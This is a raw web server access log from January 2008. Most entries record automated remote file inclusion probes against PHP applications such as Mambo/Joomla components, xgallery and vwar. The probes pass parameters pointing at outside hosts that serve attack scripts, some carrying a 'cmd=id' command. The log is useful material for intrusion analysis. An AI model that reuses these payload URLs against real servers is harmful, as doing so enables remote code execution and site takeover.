89.111.176.90 - - [18/Jan/2008:06:12:18 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.165.93 - - [18/Jan/2008:06:16:13 -0800] "GET /logs/access_071222.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.93 - - [18/Jan/2008:06:16:14 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
86.109.165.93 - - [18/Jan/2008:06:16:14 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.stalkergameserver.com/website/templates/cv.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.71.171.52 - - [18/Jan/2008:06:21:32 -0800] "GET /logs//header.php?set_menu=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.71.171.52 - - [18/Jan/2008:06:21:32 -0800] "GET //header.php?set_menu=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:21:35 -0800] "GET /logs//header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:21:35 -0800] "GET //header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:21:35 -0800] "GET /logs//header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:21:36 -0800] "GET /logs//header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:21:36 -0800] "GET //header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:21:36 -0800] "GET /logs//header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:21:36 -0800] "GET //header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:21:36 -0800] "GET /logs//header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:21:36 -0800] "GET //header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:21:37 -0800] "GET //header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:21:37 -0800] "GET /logs//header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:21:37 -0800] "GET /logs//header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:21:37 -0800] "GET /logs//header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:21:37 -0800] "GET /logs//header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:21:37 -0800] "GET //header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:21:37 -0800] "GET //header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:21:37 -0800] "GET //header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:21:37 -0800] "GET //header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:21:38 -0800] "GET /logs//header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:21:38 -0800] "GET //header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.13.229.88 - - [18/Jan/2008:06:22:00 -0800] "GET /oneadmin/adminfoot.php?path[docroot]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:24:23 -0800] "GET /logs/access_071110.log//header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:24:23 -0800] "GET //header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:24:23 -0800] "GET /logs//header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.26.165 - - [18/Jan/2008:06:24:30 -0800] "GET /bikes/dteel/03MAR07/?M=D HTTP/1.0" 200 692 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.45.230.146 - - [18/Jan/2008:06:24:43 -0800] "GET /logs/access_071214.log//header.php?set_menu=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.90 - - [18/Jan/2008:06:24:45 -0800] "GET /logs/access_071229.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.90 - - [18/Jan/2008:06:24:46 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://216.126.65.86/store/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.59.6.230 - - [18/Jan/2008:06:24:49 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.51.108.62 - - [18/Jan/2008:06:25:01 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.51.108.62 - - [18/Jan/2008:06:25:01 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.51.108.62 - - [18/Jan/2008:06:25:01 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.51.108.62 - - [18/Jan/2008:06:25:21 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://h1.ripway.com/memek/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.70.70.169 - - [18/Jan/2008:06:33:51 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://prevecamformacion.com/images/.smd/yes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.7.205.39 - - [18/Jan/2008:06:35:17 -0800] "GET //?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/alba.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
80.67.19.56 - - [18/Jan/2008:06:39:18 -0800] "GET /logs/index.php?option=com_shambo2&Itemid=&mosConfig_absolute_path=http://www.umpcdubai.com/mbohya??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
80.67.19.56 - - [18/Jan/2008:06:39:19 -0800] "GET /index.php?option=com_shambo2&Itemid=&mosConfig_absolute_path=http://www.umpcdubai.com/mbohya??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
64.38.22.250 - - [18/Jan/2008:06:39:59 -0800] "GET /index.php?option=com_shambo2&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/jim??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
64.38.22.250 - - [18/Jan/2008:06:39:59 -0800] "GET /logs/index.php?option=com_shambo2&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/jim??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
74.6.26.137 - - [18/Jan/2008:06:45:37 -0800] "GET /?D=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
209.59.6.230 - - [18/Jan/2008:06:47:26 -0800] "GET /logs/access_071229.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.59.6.230 - - [18/Jan/2008:06:47:27 -0800] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.59.6.230 - - [18/Jan/2008:06:47:47 -0800] "GET /logs/access.log/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://zal.sioru.net/includes/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.20.75 - - [18/Jan/2008:06:49:51 -0800] "GET /logs/access_070724.log HTTP/1.0" 200 173704 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.34.161.42 - - [18/Jan/2008:06:52:17 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
64.34.161.42 - - [18/Jan/2008:06:52:17 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://amichiamoci.com/ssl/ass/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
74.6.22.207 - - [18/Jan/2008:07:00:13 -0800] "GET /logs/access_071106.log HTTP/1.0" 200 29238 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
81.214.165.164 - - [18/Jan/2008:07:00:22 -0800] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.1egc.ru/tool20.dat?&list=1&cmd=id HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.dmulk.com"
208.71.171.52 - - [18/Jan/2008:07:02:32 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.71.171.52 - - [18/Jan/2008:07:02:32 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.71.171.52 - - [18/Jan/2008:07:03:05 -0800] "GET /logs/access_071109.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.71.171.52 - - [18/Jan/2008:07:03:05 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.71.171.52 - - [18/Jan/2008:07:03:05 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/mic.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.67.153.114 - - [18/Jan/2008:07:03:35 -0800] "GET /index.php?option=com_newsfeeds&task=view&feedid=2&Itemid=/index.php3?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.205.39 - - [18/Jan/2008:07:03:35 -0800] "GET /logs/access_071229.log//?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/alba.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.7.205.39 - - [18/Jan/2008:07:03:36 -0800] "GET /logs//?mosConfig_absolute_path=https://www.tkp.edu.hk/circular/docs/1159956406.mnt/alba.txt? HTTP/1.1" 200 30687 "-" "libwww-perl/5.808" "www.dmulk.com"
72.30.179.218 - - [18/Jan/2008:07:05:38 -0800] "GET /bikes/dteel/03MAR07/ HTTP/1.0" 200 692 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.149.85.140 - - [18/Jan/2008:07:06:42 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.149.85.140 - - [18/Jan/2008:07:07:39 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.149.85.140 - - [18/Jan/2008:07:07:40 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.93.255.93 - - [18/Jan/2008:07:09:37 -0800] "GET /logs/access.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ebaydetectives.de/files/list.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.93.255.93 - - [18/Jan/2008:07:09:37 -0800] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ebaydetectives.de/files/list.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
77.93.255.93 - - [18/Jan/2008:07:09:38 -0800] "GET /logs/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://www.ebaydetectives.de/files/list.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
72.30.216.109 - - [18/Jan/2008:07:14:29 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.149.85.140 - - [18/Jan/2008:07:15:09 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.149.85.140 - - [18/Jan/2008:07:17:24 -0800] "GET /logs/access_071016.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.149.85.140 - - [18/Jan/2008:07:19:15 -0800] "GET //administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.91.98 - - [18/Jan/2008:07:20:15 -0800] "GET /program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.crownvisioncenter.com/limesurvey/classes/core/_notes/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.149.85.140 - - [18/Jan/2008:07:21:14 -0800] "GET /logs//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.87.91.98 - - [18/Jan/2008:07:21:17 -0800] "GET /program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.crownvisioncenter.com/limesurvey/classes/core/_notes/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:07:21:47 -0800] "GET /logs/access_071229.log/index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:07:21:48 -0800] "GET /index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.28.224 - - [18/Jan/2008:07:21:48 -0800] "GET /logs/index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.coimbranight.net/web/mic? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.178.201 - - [18/Jan/2008:07:22:52 -0800] "GET /program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.crownvisioncenter.com/limesurvey/classes/core/_notes/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
195.149.85.140 - - [18/Jan/2008:07:23:20 -0800] "GET /logs/access_071016.log//administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.ewhagu.or.kr/bbs/outlogot_skin/bd.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.23.36 - - [18/Jan/2008:07:23:41 -0800] "GET /?D=D HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
64.62.206.91 - - [18/Jan/2008:07:24:11 -0800] "GET /program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.crownvisioncenter.com/limesurvey/classes/core/_notes/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
84.19.178.201 - - [18/Jan/2008:07:28:04 -0800] "GET /logs/access_071224.log/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.crownvisioncenter.com/limesurvey/classes/core/_notes/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [18/Jan/2008:07:28:04 -0800] "GET /logs/program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.crownvisioncenter.com/limesurvey/classes/core/_notes/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
202.67.153.114 - - [18/Jan/2008:07:31:31 -0800] "GET /logs/access_071214.log/index.php?option=com_newsfeeds&task=view&feedid=2&Itemid=/index.php3?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.67.153.114 - - [18/Jan/2008:07:31:31 -0800] "GET /logs/index.php?option=com_newsfeeds&task=view&feedid=2&Itemid=/index.php3?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
71.136.51.92 - - [18/Jan/2008:07:34:00 -0800] "GET /bikes/dteel/15JAN08/20080115_0002M.JPG HTTP/1.1" 304 - "http://www.st-owners.com/forums/showthread.php?t=30553&page=2" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)" "www.dmulk.com"
74.6.22.126 - - [18/Jan/2008:07:37:31 -0800] "GET /bikes/?D=A HTTP/1.0" 200 2168 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:07:38:40 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:07:38:40 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:07:38:40 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
211.233.19.105 - - [18/Jan/2008:07:38:41 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:07:39:06 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:07:39:06 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:07:39:07 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
129.81.82.103 - - [18/Jan/2008:07:39:07 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:07:39:33 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:07:39:33 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:07:39:34 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.choeurscarpediem.fr//components/com_extcalendar/bb.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
212.227.101.9 - - [18/Jan/2008:07:39:35 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.aisb.biz/amember/plugins/payment/secpay/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.dmulk.com"
213.190.51.202 - - [18/Jan/2008:07:42:29 -0800] "GET /program/wizard/includes/login.php?_SESSION[docroot_path]=http://www.crownvisioncenter.com/limesurvey/classes/core/_notes/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.214.165.164 - - [18/Jan/2008:07:43:44 -0800] "GET /?mosConfig_absolute_path=http://www.1egc.ru/tool20.dat?&list=1&cmd=id HTTP/1.0" 200 2946 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)" "www.dmulk.com"
213.190.51.202 - - [18/Jan/2008:07:47:41 -0800] "GET /index.php?option=com_glossary&Itemid=&mosConfig_absolute_path=http://www.crownvisioncenter.com/limesurvey/classes/core/_notes/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.237.116 - - [18/Jan/2008:07:47:47 -0800] "GET /logs/access_071203.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.237.116 - - [18/Jan/2008:07:47:47 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.237.116 - - [18/Jan/2008:07:47:47 -0800] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.147.237.116 - - [18/Jan/2008:07:48:35 -0800] "GET /logs/access_071224.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
